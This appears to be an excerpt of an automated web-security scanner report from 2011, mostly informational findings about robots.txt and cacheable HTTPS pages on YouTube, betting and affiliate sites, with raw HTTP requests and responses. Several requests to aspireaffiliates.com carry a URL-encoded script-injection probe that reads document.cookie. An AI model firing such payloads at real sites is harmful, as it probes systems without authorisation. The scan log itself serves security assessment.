Content-Length: 24

User-agent: *
Disallow:

23.101. http://www.youtube.com/v/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /v/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Apache
Last-Modified: Fri, 13 May 2011 03:51:37 GMT
ETag: "21b-4a32038f98440"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...

24. Cacheable HTTPS response
There are 52 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


24.1. https://in.getclicky.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://in.getclicky.com
Path:   /

Request

GET / HTTP/1.1
Host: in.getclicky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cluid=6787569821139589215;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 4
Connection: close
Content-Type: text/html

Hmm.

24.2. https://sealinfo.verisign.com/splash

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sealinfo.verisign.com
Path:   /splash

Request

GET /splash HTTP/1.1
Host: sealinfo.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 12:10:53 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 0
Connection: close


24.3. https://www.aspireaffiliates.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Request

GET / HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:58:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

24.4. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:05:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

24.5. https://www.aspireaffiliates.com/marketing-samples/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

24.6. https://www.aspireaffiliates.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

24.7. https://www.betsson.com/en/customer-service/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /en/customer-service/

Request

GET /en/customer-service/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23563
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=IAMLJIPDMACCCMGFMONHJNKI; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:39 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Cache-Control" content="max-age=3600"/>
   <link rel="shortcut icon" href="http://www.betsson.com/favicon.ico" />
...[SNIP]...

24.8. https://www.betsson.com/en/customer-service/forgotten-password/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /en/customer-service/forgotten-password/

Request

GET /en/customer-service/forgotten-password/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13183
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAQQDRSDT=KIEEAKPDAIGMFJDJEJFFOHCB; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:39 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cache-Control" content="max-age=3600"/>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
...[SNIP]...

24.9. https://www.betsson.com/en/customer-service/privacy-statement/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /en/customer-service/privacy-statement/

Request

GET /en/customer-service/privacy-statement/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16611
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=EBMLJIPDHIKKMCGJMGGHLPPD; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:41 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Cache-Control" content="max-age=3600"/>
       <link rel="shortcut icon" href="http://www.betsson.com/favicon.ico" />
...[SNIP]...

24.10. https://www.betsson.com/en/customer-service/responsible-gaming/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /en/customer-service/responsible-gaming/

Request

GET /en/customer-service/responsible-gaming/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16796
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=JAMLJIPDANILAPALKCAONEIB; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:40 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Cache-Control" content="max-age=3600"/>
       <link rel="shortcut icon" href="http://www.betsson.com/favicon.ico" />
...[SNIP]...

24.11. https://www.betsson.com/en/customer-service/terms/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /en/customer-service/terms/index.asp

Request

GET /en/customer-service/terms/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68223
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=CBMLJIPDBDPNKEECBALHKDED; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:41 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Cache-Control" content="max-age=3600"/>
       <meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
...[SNIP]...

24.12. https://www.betsson.com/my-account/refer-a-friend/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /my-account/refer-a-friend/index.asp

Request

GET /my-account/refer-a-friend/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23633
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAQQDRSDT=FCFEAKPDAANKFEPNPAAALGCD; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:09:12 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta htt
...[SNIP]...
<meta name="msvalidate.01" content="20E204356B944D779D09EC561E3AD780" />
<meta http-equiv="Cache-Control" content="max-age=3600"/>
       <meta name="WT.cg_n" content="Start" />
...[SNIP]...

24.13. https://www.interwetten.com/en/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/Default.aspx

Request

GET /en/Default.aspx HTTP/1.1
Host: www.interwetten.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerPool_Web01-Web07=1717899692.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=hb2ctrm1vmsjvqy123bfn1ln; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=hb2ctrm1vmsjvqy123bfn1ln; path=/; HttpOnly
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 11:44:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:44:27 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 33754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<hea
...[SNIP]...

24.14. https://www.interwetten.com/en/american-football-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/american-football-betting

Request

GET /en/american-football-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:09 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:09 GMT
Connection: close
Content-Length: 223280
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.15. https://www.interwetten.com/en/australian-rules-football-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/australian-rules-football-betting

Request

GET /en/australian-rules-football-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:32 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:32 GMT
Connection: close
Content-Length: 223367
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.16. https://www.interwetten.com/en/beach-soccer-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/beach-soccer-betting

Request

GET /en/beach-soccer-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:21 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:21 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:21 GMT
Connection: close
Content-Length: 221952
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.17. https://www.interwetten.com/en/boxing-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/boxing-betting

Request

GET /en/boxing-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:12 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:12 GMT
Connection: close
Content-Length: 223215
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.18. https://www.interwetten.com/en/casino/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/casino/default.aspx

Request

GET /en/casino/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:04 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:04 GMT
Content-Length: 355910
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...

24.19. https://www.interwetten.com/en/cycling-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/cycling-betting

Request

GET /en/cycling-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:41 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:40 GMT
Connection: close
Content-Length: 223291
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.20. https://www.interwetten.com/en/darts-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/darts-betting

Request

GET /en/darts-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:12 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:12 GMT
Connection: close
Content-Length: 224110
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.21. https://www.interwetten.com/en/football-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/football-betting

Request

GET /en/football-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:13 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:13 GMT
Connection: close
Content-Length: 261103
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.22. https://www.interwetten.com/en/games/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/games/default.aspx

Request

GET /en/games/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:05 GMT
Content-Length: 58330
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head
